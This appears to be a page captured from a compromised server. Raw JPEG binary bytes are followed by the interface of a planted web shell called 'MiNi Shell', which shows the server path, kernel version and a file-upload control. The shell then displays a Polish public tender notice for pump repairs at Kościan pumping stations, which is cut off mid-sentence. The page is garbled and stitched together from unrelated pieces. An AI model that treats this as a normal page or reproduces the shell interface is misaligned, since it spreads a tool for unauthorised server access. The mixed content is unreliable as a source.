JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210527/0006652802-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00066528 z dnia 2021-05-27</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Naprawa pomp - pompownie NW Kościan </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368302575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żelazna 59a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-848</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne-poznan@wody.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wody.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa Osoba Prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Naprawa pomp - pompownie NW Kościan </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0f036b5a-becc-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00066528</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010273/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.51 Naprawa pomp na terenie NW Kościan - RZGW Poznań</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.wody.gov.pl/wp/auctions/r6548,Naprawa-pomp-pompownie-NW-Koscian.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przetargi.wody.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z<br/>art. 61 ust. 1 ustawy Pzp komunikacja między Zamawiającym a Wykonawcami odbywa się w formie elektronicznej, za pośrednictwem Platformy Zakupowej – zwanej dalej „Platformą” – pod adresem: https://przetargi.wody.gov.pl <br/>Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z Platformy znajduje się pod adresem<br/>www.przetargi.wody.gov.pl w zakładce: Instrukcja dla Wykonawców. Korzystanie z Platformy nie<br/>wymaga zarejestrowania konta na Platformie.Dokumenty związane z postępowaniem Zamawiający<br/>zamieszcza na Platformie w zakładce z przedmiotowym postępowaniem. Celem skomunikowania się z<br/>Zamawiającym (z wyłączeniem złożenia oferty oraz dokumentów lub oświadczeń składanych razem z<br/>ofertą, których sposób złożenia został opisany w pkt 14 specyfikacji warunków zamówienia, zwanej<br/>dalej „SWZ”), Wykonawca korzysta z zakładki „Zapytaj”. Zakładka ta służy również Zamawiającemu do<br/>komunikacji z Wykonawcami. Za datę wpływu wszelkiej korespondencji do Zamawiającego, w tym<br/>złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą, uważa się datę wczytania<br/>korespondencji na Platformie. Zamawiający zaleca sporządzenie korespondencji w następujących<br/>formatach: .doc., .docx,.rtf, .pdf, .xls. Maksymalny rozmiar plików przesyłanych za pośrednictwem<br/>Platformy wynosi 150 MB. Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Platformy jako załączniki. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U z2020 r. poz. 2452) oraz Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy. (Dz. U. z 2020 r. poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja dotycząca przetwarzania danych osobowych.<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję,<br/>że:a) administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Wodne Wody<br/>Polskie z siedzibą w Warszawie przy ul. Żelaznej 59A, 00-848 Warszawa, REGON: 368302575, NIP:<br/>527-282-56-16;b) kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem e-mail:<br/>iod@wody.gov.pl lub riod.poznan@wody.gov.plc) Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego oznaczonego numerem postępowania PO.ROZ.2810.35.2021 prowadzonym na podstawie<br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;d) odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;e) Dane<br/>osobowe zawarte w ofercie będą przechowywane przez okres wskazany w art. 78 ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych, a w przypadku zawarcia umowy przez okres<br/>obowiązywania umowy, z uwzględnieniem pozostałych wymagań prawnych, w tym okresów<br/>przechowywania wskazanych przez instytucje biorące udział w dofinansowaniu oraz w przepisach<br/>dotyczących przechowywania dokumentacji do celów rozliczeniowych i archiwalnych;f) obowiązek<br/>podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych;g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.h) posiada Pani/Pan:- na<br/>podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;- na podstawie<br/>art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z<br/>przepisami ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz nie może naruszać<br/>integralności protokołu oraz jego załączników);- na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na<br/>ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);- prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że<br/>przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODOi) nie przysługuje<br/>Państwu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;-<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PO.ROZ.2810.35.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - Pompownia Kąty Przedmiotem zamówienia jest wykonanie usługi naprawy pomp na<br/>terenie Nadzoru Wodnego Kościan.Szczegółowy zakres i rodzaj prac przewidzianych do<br/>wykonania w ramach przedmiotu zamówienia dla poszczególnych części określa Załącznik do<br/>SWZ: Opis przedmiotu zamówienia wraz z Protokołami z przeglądu pomp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50511000-0 - Usługi w zakresie napraw i konserwacji pomp</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie będą podlegały oferty ważne tj. oferty niepodlegające<br/>odrzuceniu.Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów<br/>obliczonych w oparciu o ustalone kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - Pompownia WojnowicePrzedmiotem zamówienia jest wykonanie usługi naprawy pomp<br/>na terenie Nadzoru Wodnego Kościan.Szczegółowy zakres i rodzaj prac przewidzianych do<br/>wykonania w ramach przedmiotu zamówienia dla poszczególnych części określa Załącznik do<br/>SWZ: Opis przedmiotu zamówienia wraz z Protokołami z przeglądu pomp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50511000-0 - Usługi w zakresie napraw i konserwacji pomp</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie będą podlegały oferty ważne tj. oferty niepodlegające<br/>odrzuceniu.Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów<br/>obliczonych w oparciu o ustalone kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 - Pompownie: Zbęchy, Wonieść, Drzeczkowo, Nielęgowo, SeparowoPrzedmiotem<br/>zamówienia jest wykonanie usługi naprawy pomp na terenie Nadzoru Wodnego Kościan i<br/>Nadzoru Wodnego Gostyń.Szczegółowy zakres i rodzaj prac przewidzianych do wykonania w<br/>ramach przedmiotu zamówienia dla poszczególnych części określa Załącznik do SWZ: Opis<br/>przedmiotu zamówienia wraz z Protokołami z przeglądu pomp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50511000-0 - Usługi w zakresie napraw i konserwacji pomp</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie będą podlegały oferty ważne tj. oferty niepodlegające<br/>odrzuceniu.Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów<br/>obliczonych w oparciu o ustalone kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna i zawodowa:Na potwierdzenie spełnienia warunku Zamawiający wymaga, aby Wykonawca wykazał się doświadczeniem w wykonaniu usług, a w przypadku świadczeń<br/>okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie<br/>poprzez wykonanie co najmniej 1 usługi o charakterze zgodnym z przedmiotem zamówienia<br/>(naprawa i/lub serwis pomp), o wartości:- dla części 1 nie mniejszej niż 45 000 zł brutto,- dla<br/>części 2 nie mniejszej niż 30 000 zł brutto,- dla części 3 nie mniejszej niż 145 000 zł brutto.(W<br/>przypadku kontraktów zawieranych w walucie obcej wartość robót podlega przeliczeniu z<br/>zastosowaniem średniego kursu waluty obcej podawanego przez Narodowy Bank Polski dla<br/>dnia zawarcia umowy)W odniesieniu do Wykonawcy składającego ofertę na kilka części<br/>dotyczących naprawy i/lub serwisu pomp, warunek zostanie uznany za spełniony, gdy<br/>Wykonawca wykaże się doświadczeniem w zakresie naprawy i/lub serwisu pomp o wartości<br/>określonej dla tej części, dla której wskazano większa wartość. Przykładowo Wykonawca<br/>składający ofertę na realizację części 1 i części 3 zobowiązany jest do wykazania się<br/>doświadczeniem w zakresie naprawy i/lub serwisu pomp o wartości min. 145 000 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>zamawiającego, o których mowa w: art. 108 ust. 1 pkt 3, art. 108 ust. 1 pkt 4, art. 108 ust. 1 pkt 5, art.<br/>108 ust. 1 pkt 6;<br/>- odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, sporządzonego nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia<br/>braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>- oświadczenia wykonawcy,<br/>o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej, niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej;Wykonawca nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa powyżej, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a 